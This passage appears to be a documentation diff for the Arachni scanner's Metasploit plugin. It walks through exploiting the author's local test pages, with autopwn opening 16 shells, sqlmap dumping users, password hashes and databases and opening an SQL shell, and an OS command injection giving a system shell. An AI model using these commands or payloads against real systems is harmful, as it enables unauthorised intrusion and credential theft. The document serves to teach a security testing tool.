14 127.0.0.1 /~zapotek/tests/links/os_command.php OS command injection GET {"os_command"=>"XXinjectionXX\x00"} unix/webapp/arachni_exec
|
167
|
+
15 127.0.0.1 /~zapotek/tests/links/os_command.php OS command injection GET {"os_command"=>"XXinjectionXX"} unix/webapp/arachni_exec
|
168
|
+
16 127.0.0.1 /~zapotek/tests/links/rfi.php Remote file inclusion GET {"rfi"=>"XXinjectionXX\x00"} unix/webapp/arachni_php_include
|
169
|
+
17 127.0.0.1 /~zapotek/tests/links/rfi.php Remote file inclusion GET {"rfi"=>"XXinjectionXX"} unix/webapp/arachni_php_include
|
170
|
+
18 127.0.0.1 /~zapotek/tests/links/eval.php Code injection GET {"eval"=>";XXinjectionXX"} unix/webapp/arachni_php_eval
|
171
|
+
19 127.0.0.1 /~zapotek/tests/links/sqli.php Blind SQL Injection GET {"id"=>"1"} unix/webapp/arachni_sqlmap
|
172
|
+
|
173
|
+
|
174
|
+
|
175
|
+
[*] Done!
|
176
|
+
msf >
|
177
|
+
|
178
|
+
#### Automated exploitation (arachni_autopwn)
|
179
|
+
|
180
|
+
##### Usage
|
181
|
+
msf > arachni_autopwn
|
182
|
+
[*] Usage: arachni_autopwn [options]
|
183
|
+
-h Display this help text
|
184
|
+
-x [regexp] Only run modules whose name matches the regex
|
185
|
+
-a Launch exploits against all matched targets
|
186
|
+
-r Use a reverse connect shell
|
187
|
+
-b Use a bind shell on a random port (default)
|
188
|
+
-m Use a meterpreter shell (if possible)
|
189
|
+
-q Disable exploit module output
|
190
|
+
|
191
|
+
##### Example
|
192
|
+
msf > arachni_autopwn -a
|
193
|
+
[*] Running pwn-jobs...
|
194
|
+
[...snip...]
|
195
|
+
[*] Command shell session 1 opened (127.0.0.1:54598 -> 127.0.0.1:5019) at 2010-10-28 18:26:00 +0100
|
196
|
+
[*] Command shell session 2 opened (127.0.0.1:55336 -> 127.0.0.1:8541) at 2010-10-28 18:26:00 +0100
|
197
|
+
[*] Command shell session 3 opened (127.0.0.1:37880 -> 127.0.0.1:12465) at 2010-10-28 18:26:00 +0100
|
198
|
+
[*] Command shell session 4 opened (127.0.0.1:49451 -> 127.0.0.1:10866) at 2010-10-28 18:26:00 +0100
|
199
|
+
[*] Command shell session 5 opened (127.0.0.1:40276 -> 127.0.0.1:11915) at 2010-10-28 18:26:00 +0100
|
200
|
+
[*] Command shell session 6 opened (127.0.0.1:34400 -> 127.0.0.1:5222) at 2010-10-28 18:26:00 +0100
|
201
|
+
[*] Command shell session 7 opened (127.0.0.1:58456 -> 127.0.0.1:10955) at 2010-10-28 18:26:00 +0100
|
202
|
+
[*] Command shell session 9 opened (127.0.0.1:48549 -> 127.0.0.1:5929) at 2010-10-28 18:26:00 +0100
|
203
|
+
[*] Command shell session 8 opened (127.0.0.1:47028 -> 127.0.0.1:12432) at 2010-10-28 18:26:00 +0100
|
204
|
+
[*] Command shell session 10 opened (127.0.0.1:38239 -> 127.0.0.1:11919) at 2010-10-28 18:26:00 +0100
|
205
|
+
[*] Command shell session 11 opened (127.0.0.1:58541 -> 127.0.0.1:14343) at 2010-10-28 18:26:01 +0100
|
206
|
+
[*] Command shell session 12 opened (127.0.0.1:48655 -> 127.0.0.1:13743) at 2010-10-28 18:26:01 +0100
|
207
|
+
[*] Command shell session 13 opened (127.0.0.1:59996 -> 127.0.0.1:8895) at 2010-10-28 18:26:01 +0100
|
208
|
+
[*] Command shell session 14 opened (127.0.0.1:53717 -> 127.0.0.1:10767) at 2010-10-28 18:26:01 +0100
|
209
|
+
[*] Command shell session 15 opened (127.0.0.1:51623 -> 127.0.0.1:7668) at 2010-10-28 18:26:01 +0100
|
210
|
+
[*] Command shell session 16 opened (127.0.0.1:47874 -> 127.0.0.1:8965) at 2010-10-28 18:26:02 +0100
|
211
|
+
[...snip...]
|
212
|
+
[*] The autopwn command has completed with 16 sessions
|
213
|
+
[*] Enter sessions -i [ID] to interact with a given session ID
|
214
|
+
[*]
|
215
|
+
[*] ================================================================================
|
216
|
+
|
217
|
+
Active sessions
|
218
|
+
===============
|
219
|
+
|
220
|
+
Id Type Information Connection Via
|
221
|
+
-- ---- ----------- ---------- ---
|
222
|
+
1 shell 127.0.0.1:54598 -> 127.0.0.1:5019 exploit/unix/webapp/arachni_php_eval
|
223
|
+
2 shell 127.0.0.1:55336 -> 127.0.0.1:8541 exploit/unix/webapp/arachni_exec
|
224
|
+
3 shell 127.0.0.1:37880 -> 127.0.0.1:12465 exploit/unix/webapp/arachni_exec
|
225
|
+
4 shell 127.0.0.1:49451 -> 127.0.0.1:10866 exploit/unix/webapp/arachni_php_include
|
226
|
+
5 shell 127.0.0.1:40276 -> 127.0.0.1:11915 exploit/unix/webapp/arachni_php_eval
|
227
|
+
6 shell 127.0.0.1:34400 -> 127.0.0.1:5222 exploit/unix/webapp/arachni_exec
|
228
|
+
7 shell 127.0.0.1:58456 -> 127.0.0.1:10955 exploit/unix/webapp/arachni_php_include
|
229
|
+
8 shell 127.0.0.1:47028 -> 127.0.0.1:12432 exploit/unix/webapp/arachni_exec
|
230
|
+
9 shell 127.0.0.1:48549 -> 127.0.0.1:5929 exploit/unix/webapp/arachni_exec
|
231
|
+
10 shell 127.0.0.1:38239 -> 127.0.0.1:11919 exploit/unix/webapp/arachni_exec
|
232
|
+
11 shell 127.0.0.1:58541 -> 127.0.0.1:14343 exploit/unix/webapp/arachni_php_include
|
233
|
+
12 shell 127.0.0.1:48655 -> 127.0.0.1:13743 exploit/unix/webapp/arachni_php_include
|
234
|
+
13 shell 127.0.0.1:59996 -> 127.0.0.1:8895 exploit/unix/webapp/arachni_php_include
|
235
|
+
14 shell 127.0.0.1:53717 -> 127.0.0.1:10767 exploit/unix/webapp/arachni_php_include
|
236
|
+
15 shell 127.0.0.1:51623 -> 127.0.0.1:7668 exploit/unix/webapp/arachni_php_eval
|
237
|
+
16 shell 127.0.0.1:47874 -> 127.0.0.1:8965 exploit/unix/webapp/arachni_php_include
|
238
|
+
|
239
|
+
[*] ================================================================================
|
240
|
+
msf > sessions -i 1
|
241
|
+
[*] Starting interaction with 1...
|
242
|
+
|
243
|
+
ls
|
244
|
+
eval.php
|
245
|
+
os_command.php
|
246
|
+
rfi.php
|
247
|
+
sqli.php
|
248
|
+
xss.php
|
249
|
+
|
250
|
+
whoami
|
251
|
+
www-data
|
252
|
+
^C
|
253
|
+
Abort session 1? [y/N] y
|
254
|
+
|
255
|
+
[*] Command shell session 1 closed. Reason: User exit
|
256
|
+
msf >
|
257
|
+
|
258
|
+
Notice that we ended up with 16 sessions out of the 19 reported vulnerabilities. <br/>
|
259
|
+
This is due to the fact that the "unix/webapp/arachni_sqlmap" exploit can't be launched automatically and because some of the reported vulnerabilities are basically the same.
|
260
|
+
|
261
|
+
Next we'll see how to use the "arachni_manual" command for assisted exploitation and get an SQL shell.
|
262
|
+
|
263
|
+
### Assisted exploitation (arachni_manual)
|
264
|
+
msf > arachni_list_vulns # Let's take a look at the available vulnerabilities once again.
|
265
|
+
|
266
|
+
Vulnerabilities
|
267
|
+
===============
|
268
|
+
|
269
|
+
ID Host Path Name Method Params Exploit
|
270
|
+
-- ---- ---- ---- ------ ------ -------
|
271
|
+
1 127.0.0.1 /~zapotek/tests/trainer.php Remote file inclusion COOKIE {"rfi"=>"XXinjectionXX\x00"} unix/webapp/arachni_php_include
|
272
|
+
2 127.0.0.1 /~zapotek/tests/trainer.php Remote file inclusion COOKIE {"rfi"=>"XXinjectionXX"} unix/webapp/arachni_php_include
|
273
|
+
3 127.0.0.1 /~zapotek/tests/cookies/os_command.php OS command injection COOKIE {"os_command"=>"XXinjectionXX\x00"} unix/webapp/arachni_exec
|
274
|
+
4 127.0.0.1 /~zapotek/tests/cookies/os_command.php OS command injection COOKIE {"os_command"=>"XXinjectionXX"} unix/webapp/arachni_exec
|
275
|
+
5 127.0.0.1 /~zapotek/tests/cookies/rfi.php Remote file inclusion COOKIE {"rfi"=>"XXinjectionXX\x00"} unix/webapp/arachni_php_include
|
276
|
+
6 127.0.0.1 /~zapotek/tests/cookies/rfi.php Remote file inclusion COOKIE {"rfi"=>"XXinjectionXX"} unix/webapp/arachni_php_include
|
277
|
+
7 127.0.0.1 /~zapotek/tests/cookies/eval.php Code injection COOKIE {"eval"=>"%3BXXinjectionXX"} unix/webapp/arachni_php_eval
|
278
|
+
8 127.0.0.1 /~zapotek/tests/forms/eval.php Code injection POST {"eval"=>";XXinjectionXX"} unix/webapp/arachni_php_eval
|
279
|
+
9 127.0.0.1 /~zapotek/tests/forms/os_command.php OS command injection POST {"os_command"=>"XXinjectionXX\x00"} unix/webapp/arachni_exec
|
280
|
+
10 127.0.0.1 /~zapotek/tests/forms/os_command.php OS command injection POST {"os_command"=>"XXinjectionXX"} unix/webapp/arachni_exec
|
281
|
+
11 127.0.0.1 /~zapotek/tests/forms/rfi.php Remote file inclusion POST {"rfi"=>"XXinjectionXX\x00"} unix/webapp/arachni_php_include
|
282
|
+
12 127.0.0.1 /~zapotek/tests/forms/rfi.php Remote file inclusion POST {"rfi"=>"XXinjectionXX"} unix/webapp/arachni_php_include
|
283
|
+
13 127.0.0.1 /~zapotek/tests/forms/sqli.php SQL Injection POST {"sql_inj"=>"1"} unix/webapp/arachni_sqlmap
|
284
|
+
14 127.0.0.1 /~zapotek/tests/links/os_command.php OS command injection GET {"os_command"=>"XXinjectionXX\x00"} unix/webapp/arachni_exec
|
285
|
+
15 127.0.0.1 /~zapotek/tests/links/os_command.php OS command injection GET {"os_command"=>"XXinjectionXX"} unix/webapp/arachni_exec
|
286
|
+
16 127.0.0.1 /~zapotek/tests/links/rfi.php Remote file inclusion GET {"rfi"=>"XXinjectionXX\x00"} unix/webapp/arachni_php_include
|
287
|
+
17 127.0.0.1 /~zapotek/tests/links/rfi.php Remote file inclusion GET {"rfi"=>"XXinjectionXX"} unix/webapp/arachni_php_include
|
288
|
+
18 127.0.0.1 /~zapotek/tests/links/eval.php Code injection GET {"eval"=>";XXinjectionXX"} unix/webapp/arachni_php_eval
|
289
|
+
19 127.0.0.1 /~zapotek/tests/links/sqli.php Blind SQL Injection GET {"id"=>"1"} unix/webapp/arachni_sqlmap
|
290
|
+
|
291
|
+
|
292
|
+
msf > arachni_manual 19 # The vulnerability with ID '19' uses the 'unix/webapp/arachni_sqlmap' module
|
293
|
+
[*] Using unix/webapp/arachni_sqlmap .
|
294
|
+
[*] Preparing datastore for 'Blind SQL Injection' vulnerability @ 127.0.0.1/~zapotek/tests/links/sqli.php ...
|
295
|
+
SRVHOST => 127.0.0.1
|
296
|
+
SRVPORT => 7872
|
297
|
+
RHOST => 127.0.0.1
|
298
|
+
RPORT => 80
|
299
|
+
LHOST => 127.0.0.1
|
300
|
+
LPORT => 12633
|
301
|
+
SSL => false
|
302
|
+
GET => id=1
|
303
|
+
METHOD => GET
|
304
|
+
COOKIES =>
|
305
|
+
HEADERS => Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8::User-Agent=Arachni/0.2.1
|
306
|
+
PATH => /~zapotek/tests/links/sqli.php
|
307
|
+
[*] Done!
|
308
|
+
|
309
|
+
Compatible payloads
|
310
|
+
===================
|
311
|
+
|
312
|
+
Name Description
|
313
|
+
---- -----------
|
314
|
+
|
315
|
+
|
316
|
+
Use: set PAYLOAD <name>
|
317
|
+
msf auxiliary(arachni_sqlmap) > show options # Make sure that everything is setup properly
|
318
|
+
|
319
|
+
Module options:
|
320
|
+
|
321
|
+
Name Current Setting Required Description
|
322
|
+
---- --------------- -------- -----------
|
323
|
+
COOKIES no
|
324
|
+
GET id=1 no HTTP GET query
|
325
|
+
METHOD GET yes HTTP Method
|
326
|
+
OPTS --users --time-test --passwords --dbs --sql-shell -v 0 no The sqlmap options to use
|
327
|
+
PATH /~zapotek/tests/links/sqli.php yes The path to test for SQL injection
|
328
|
+
POST no The data string to be sent through POST
|
329
|
+
Proxies no Use a proxy chain
|
330
|
+
RHOST 127.0.0.1 yes The target address
|
331
|
+
RPORT 80 yes The target port
|
332
|
+
SQLMAP_PATH sqlmap yes The sqlmap >= 0.8 full path
|
333
|
+
VHOST no HTTP server virtual host
|
334
|
+
|
335
|
+
msf auxiliary(arachni_sqlmap) > set SQLMAP_PATH /home/zapotek/Downloads/sqlmap/sqlmap.py # Tell the module where the sqlmap script is
|
336
|
+
SQLMAP_PATH => /home/zapotek/Downloads/sqlmap/sqlmap.py
|
337
|
+
msf auxiliary(arachni_sqlmap) > exploit # rock it!
|
338
|
+
|
339
|
+
[*] exec: /home/zapotek/Downloads/sqlmap/sqlmap.py -u 'http://127.0.0.1:80//~zapotek/tests/links/sqli.php?id=1' --method GET --users --time-test --passwords --dbs --sql-shell -v 0 --cookie ''
|
340
|
+
|
341
|
+
sqlmap/0.8 - automatic SQL injection and database takeover tool
|
342
|
+
http://sqlmap.sourceforge.net
|
343
|
+
|
344
|
+
[*] starting at: 15:08:25
|
345
|
+
|
346
|
+
[15:08:26] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
|
347
|
+
web server operating system: Linux Ubuntu
|
348
|
+
web application technology: PHP 5.3.3, Apache 2.2.16
|
349
|
+
back-end DBMS: MySQL >= 5.0.0
|
350
|
+
|
351
|
+
time based blind sql injection payload: 'id=1%27%20AND%20SLEEP%285%29%20AND%20%27HXME%27=%27HXME'
|
352
|
+
|
353
|
+
database management system users [5]:
|
354
|
+
[*] 'debian-sys-maint'@'localhost'
|
355
|
+
[*] 'phpmyadmin'@'localhost'
|
356
|
+
[*] 'root'@'127.0.0.1'
|
357
|
+
[*] 'root'@'localhost'
|
358
|
+
[*] 'root'@'zonster'
|
359
|
+
|
360
|
+
database management system users password hashes:
|
361
|
+
[*] debian-sys-maint [1]:
|
362
|
+
password hash: *7AD474111CBF8492D9311D6E8493490ED6247D86
|
363
|
+
[*] phpmyadmin [1]:
|
364
|
+
password hash: *C3A70F18627A18967A3A70C0F648CDEE0BCE9AB2
|
365
|
+
[*] root [1]:
|
366
|
+
password hash: NULL
|
367
|
+
|
368
|
+
available databases [5]:
|
369
|
+
[*] arachni
|
370
|
+
[*] information_schema
|
371
|
+
[*] msf
|
372
|
+
[*] mysql
|
373
|
+
[*] phpmyadmin
|
374
|
+
|
375
|
+
sql-shell> CURRENT_USER() # And we now have an SQL shell to play with!
|
376
|
+
do you want to retrieve the SQL statement output? [Y/n]
|
377
|
+
CURRENT_USER(): 'root@localhost'
|
378
|
+
sql-shell> VERSION()
|
379
|
+
do you want to retrieve the SQL statement output? [Y/n]
|
380
|
+
VERSION(): '5.1.49-1ubuntu8'
|
381
|
+
|
382
|
+
sql-shell> q
|
383
|
+
|
384
|
+
[*] shutting down at: 15:09:07
|
385
|
+
|
386
|
+
[*] Auxiliary module execution completed
|
387
|
+
msf auxiliary(arachni_sqlmap) >
|
388
|
+
|
389
|
+
Of course 'arachni_manual' is not limited to any one module.
|
390
|
+
For example:
|
391
|
+
msf auxiliary(arachni_sqlmap) > arachni_manual 15 # Prepare the vulnerability with ID '15'
|
392
|
+
[*] Using unix/webapp/arachni_exec .
|
393
|
+
[*] Preparing datastore for 'OS command injection' vulnerability @ 127.0.0.1/~zapotek/tests/links/os_command.php ...
|
394
|
+
SRVHOST => 127.0.0.1
|
395
|
+
SRVPORT => 9033
|
396
|
+
RHOST => 127.0.0.1
|
397
|
+
RPORT => 80
|
398
|
+
LHOST => 127.0.0.1
|
399
|
+
LPORT => 11853
|
400
|
+
SSL => false
|
401
|
+
GET => os_command=XXinjectionXX
|
402
|
+
METHOD => GET
|
403
|
+
COOKIES =>
|
404
|
+
HEADERS => Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8::User-Agent=Arachni/0.2.1
|
405
|
+
PATH => /~zapotek/tests/links/os_command.php
|
406
|
+
[*] Done!
|
407
|
+
PAYLOAD => cmd/unix/bind_perl
|
408
|
+
msf exploit(arachni_exec) > exploit # rock it!
|
409
|
+
|
410
|
+
[*] Sending HTTP request for /~zapotek/tests/links/os_command.php
|
411
|
+
[*] Started bind handler
|
412
|
+
[*] Command shell session 17 opened (127.0.0.1:45295 -> 127.0.0.1:11853) at 2010-10-29 15:13:48 +0100 # And we now have a system shell!
|
413
|
+
|
414
|
+
ls
|
415
|
+
eval.php
|
416
|
+
os_command.php
|
417
|
+
redirect.php
|
418
|
+
rfi.php
|
419
|
+
sqli.php
|
420
|
+
xss.php
|
421
|
+
|
422
|
+
whoami
|
423
|
+
www-data
|
424
|
+
^C
|
425
|
+
Abort session 17? [y/N] y
|
426
|
+
|
427
|
+
[*] Command shell session 17 closed. Reason: User exit
|
428
|
+
msf exploit(arachni_exec) >
|
429
|
+
|